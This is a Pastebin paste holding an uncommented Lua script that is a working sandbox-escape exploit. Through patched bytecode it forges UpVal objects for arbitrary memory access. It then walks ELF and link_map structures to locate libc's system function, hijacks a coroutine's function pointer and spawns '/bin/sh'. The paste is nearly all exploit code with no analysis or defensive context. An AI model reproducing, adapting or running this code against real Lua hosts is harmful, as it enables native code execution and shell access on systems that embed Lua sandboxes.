API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 27th, 2019
171
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.50 KB | None | 0 0
raw download clone embed print report
  1. {
  2. asnum = loadstring((string.dump(function(x)
  3. for i = x, x, 0 do
  4. return i
  5. end
  6. end):gsub("\96%z%z\128", "\22\0\0\128")))
  7.  
  8. function double_to_dwords(x)
  9. if x == 0 then return 0, 0 end
  10. if x < 0 then x = -x end
  11.  
  12. local m, e = math.frexp(x)
  13.  
  14. if e + 1023 <= 1 then
  15. m = m * 2^(e + 1074)
  16. e = 0
  17. else
  18. m = (m - 0.5) * 2^53
  19. e = e + 1022
  20. end
  21.  
  22. local lo = m % 2^32
  23. m = (m - lo) / 2^32
  24. local hi = m + e * 2^20
  25.  
  26. return lo, hi
  27. end
  28.  
  29. function dwords_to_double(lo, hi)
  30. local m = hi % 2^20
  31. local e = (hi - m) / 2^20
  32. m = m * 2^32 + lo
  33.  
  34. if e ~= 0 then
  35. m = m + 2^52
  36. else
  37. e = 1
  38. end
  39. return m * 2^(e-1075)
  40. end
  41.  
  42. function dword_to_string(x)
  43. local b0 = x % 256; x = (x - b0) / 256
  44. local b1 = x % 256; x = (x - b1) / 256
  45. local b2 = x % 256; x = (x - b2) / 256
  46. local b3 = x % 256
  47.  
  48. return string.char(b0, b1, b2, b3)
  49. end
  50.  
  51. function qword_to_string(x)
  52. local lo, hi = double_to_dwords(x)
  53. return dword_to_string(lo) .. dword_to_string(hi)
  54. end
  55.  
  56. function add_dword_to_double(x, n)
  57. local lo, hi = double_to_dwords(x)
  58. return dwords_to_double(lo + n, hi)
  59. end
  60.  
  61. rawset(_G, "add_dword_to_double", add_dword_to_double)
  62. rawset(_G, "asnum", asnum)
  63. rawset(_G, "double_to_dwords", double_to_dwords)
  64. rawset(_G, "dwords_to_double", dwords_to_double)
  65. rawset(_G, "dword_to_string", dword_to_string)
  66. rawset(_G, "qword_to_string", qword_to_string)
  67.  
  68. -- stop garbage collecting
  69. collectgarbage "stop"
  70.  
  71. f = loadstring(string.dump(function()
  72. local magic = nil
  73. local function middle()
  74. local print = print
  75. local asnum = asnum
  76. local double_to_dwords = double_to_dwords
  77. local add_dword_to_double = add_dword_to_double
  78. local dwords_to_double = dwords_to_double
  79. local qword_to_string = qword_to_string
  80. local co = coroutine.wrap(function() end)
  81. local substr = string.sub
  82. local find = string.find
  83. local upval
  84.  
  85. -- get the address of current "lua_State"
  86. local luastate1 = asnum(coroutine.running())
  87. local luastate2 = add_dword_to_double(luastate1, 8)
  88.  
  89. -- some constants
  90. local n1 = 1
  91. local n2 = 2
  92. local n4 = 4
  93. local n6 = 6
  94. local n7 = 7
  95. local n8 = 8
  96. local n16 = 16
  97. local n24 = 24
  98. local n32 = 32
  99.  
  100. local pht_offset_from_auxwrap = 0x8ba060
  101. local h38 = 0x38 -- program header entry size
  102.  
  103. local PT_DYNAMIC = 2
  104. local DT_NULL = 0
  105. local DT_STRRAB = 5
  106. local DT_SYMTAB = 6
  107. local DT_DEBUG = 21
  108.  
  109. local libc = "libc.so."
  110. local system = "__libc_system"
  111. local null = "\0"
  112. local empty = ""
  113.  
  114. -- declare some variables
  115. local luastate1_bkp
  116. local luastate2_bkp
  117.  
  118. local lo, hi
  119. local base
  120. local ptheader
  121. local dynamic
  122. local symbol
  123.  
  124. local libc_base
  125. local libc_system
  126. local libc_strtab
  127. local libc_symtab
  128. local debug
  129.  
  130. local s, e, tmp, n
  131. local str = empty
  132. local link_map
  133. local libc_dynamic
  134.  
  135. local commands = {
  136. dwords_to_double(0x7273752f, 0x6e69622f), dwords_to_double(0x7365722f, 0x00007465), -- "/usr/bin/reset"
  137. dwords_to_double(0x6e69622f, 0x0068732f), dwords_to_double(0x00000000, 0x00000000) } -- "/bin/sh"
  138.  
  139. local function put_into_magic(n)
  140. -- hand-craft an UpVal
  141. upval = "nextnexttmpaddpa" .. qword_to_string(n)
  142.  
  143. -- get the pointer to our hand-crafted UpVal
  144. local upval_ptr = qword_to_string(add_dword_to_double(asnum(upval), 24))
  145.  
  146. magic = upval_ptr .. upval_ptr .. upval_ptr
  147. end
  148.  
  149. -- put luaB_auxwrap's address into "magic"
  150. put_into_magic(add_dword_to_double(asnum(co), n32))
  151.  
  152. -- get offset to Program Header Table (ELF Header + 32)
  153. lo, hi = double_to_dwords(asnum(magic))
  154. base = dwords_to_double(lo - pht_offset_from_auxwrap, hi)
  155. put_into_magic(add_dword_to_double(base, n32))
  156.  
  157. -- get real address of Program Header Table
  158. lo, hi = double_to_dwords(asnum(magic))
  159. ptheader = add_dword_to_double(base, lo)
  160.  
  161. -- get the _DYNAMIC section's address
  162. while true do
  163. put_into_magic(ptheader)
  164. lo, hi = double_to_dwords(asnum(magic))
  165. if lo == PT_DYNAMIC then
  166. -- p_vaddr : elf64_phdr+16
  167. put_into_magic(add_dword_to_double(ptheader, n16))
  168. dynamic = asnum(magic)
  169. break
  170. else
  171. ptheader = add_dword_to_double(ptheader, h38)
  172. end
  173. end
  174.  
  175. dynamic = dynamic + base
  176.  
  177. -- get DT_DEBUG
  178. while true do
  179. put_into_magic(dynamic)
  180. lo, hi = double_to_dwords(asnum(magic))
  181.  
  182. if lo == DT_DEBUG then
  183. put_into_magic(add_dword_to_double(dynamic, n8))
  184. debug = asnum(magic)
  185. break
  186. else
  187. dynamic = add_dword_to_double(dynamic, n16)
  188. end
  189. end
  190.  
  191. -- get the pointer to the link_map structure
  192. put_into_magic(add_dword_to_double(debug, n8))
  193. link_map = asnum(magic)
  194.  
  195. -- iterate link_map until libc is found
  196. while true do
  197.  
  198. put_into_magic(add_dword_to_double(link_map, n8))
  199. n = asnum(magic)
  200.  
  201. -- we can read only 8 bytes at once, so we have to loop
  202. while true do
  203. put_into_magic(n)
  204. tmp = qword_to_string(asnum(magic))
  205.  
  206. s, e = find(tmp, null)
  207. if s then
  208. str = str .. substr(tmp, n1, s - n1)
  209. break
  210. else
  211. str = str .. tmp
  212. n = add_dword_to_double(n, n8)
  213. end
  214. end
  215.  
  216. -- have we found libc?
  217. s, e = find(str, libc)
  218. if s then
  219. put_into_magic(link_map)
  220. libc_base = asnum(magic)
  221.  
  222. -- get _DYNAMIC section for LibC
  223. put_into_magic(add_dword_to_double(link_map, n16))
  224. libc_dynamic = asnum(magic)
  225.  
  226. -- get DT_STRTAB and DT_SYMTAB from LibC
  227. while true do
  228. put_into_magic(libc_dynamic)
  229. lo, hi = double_to_dwords(asnum(magic))
  230. put_into_magic(add_dword_to_double(libc_dynamic, n8))
  231.  
  232. if lo == DT_NULL then
  233. break
  234. elseif lo == DT_STRRAB then
  235. libc_strtab = asnum(magic)
  236. elseif lo == DT_SYMTAB then
  237. libc_symtab = asnum(magic)
  238. end
  239.  
  240. libc_dynamic = add_dword_to_double(libc_dynamic, n16)
  241. end
  242.  
  243. break
  244. else
  245. put_into_magic(add_dword_to_double(link_map, n24))
  246. link_map = asnum(magic)
  247. end
  248. end
  249.  
  250. -- iterate LibC's symbol table until system (actually __libc_system) is
  251. -- found.
  252. while true do
  253. put_into_magic(libc_symtab)
  254. lo, hi = double_to_dwords(asnum(magic))
  255.  
  256. -- we can read only 8 bytes at once, so we have to loop
  257. n = add_dword_to_double(libc_strtab, lo)
  258. str = empty
  259. while true do
  260. put_into_magic(n)
  261. tmp = qword_to_string(asnum(magic))
  262.  
  263. s, e = find(tmp, null)
  264. if s then
  265. str = str .. substr(tmp, n1, s - n1)
  266. break
  267. else
  268. str = str .. tmp
  269. n = add_dword_to_double(n, n8)
  270. end
  271. end
  272.  
  273. if str and str == system then
  274. -- get __libc_sytem's real address
  275. put_into_magic(add_dword_to_double(libc_symtab, n8))
  276. lo, hi = double_to_dwords(asnum(magic))
  277. libc_system = add_dword_to_double(libc_base, lo)
  278. break
  279. else
  280. libc_symtab = add_dword_to_double(libc_symtab, n24)
  281. end
  282. end
  283.  
  284. -- replace co's function pointer to __libc_system's real address
  285. put_into_magic(add_dword_to_double(asnum(co), n32))
  286. magic = libc_system
  287.  
  288. -- save the current lua_State
  289. put_into_magic(luastate1)
  290. luastate1_bkp = asnum(magic)
  291. put_into_magic(luastate2)
  292. luastate2_bkp = asnum(magic)
  293.  
  294. -- execute commands in 16 byte chunks
  295. for i=n1,#commands,n2 do
  296. put_into_magic(luastate1)
  297. magic = commands[i]
  298. put_into_magic(luastate2)
  299. magic = commands[i + n1]
  300. co()
  301. end
  302.  
  303. -- restore the original lua_State
  304. put_into_magic(luastate1)
  305. magic = luastate1_bkp
  306. put_into_magic(luastate2)
  307. magic = luastate2_bkp
  308.  
  309. end
  310. middle()
  311. end):gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1))
  312. coroutine.wrap(f)()
  313. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!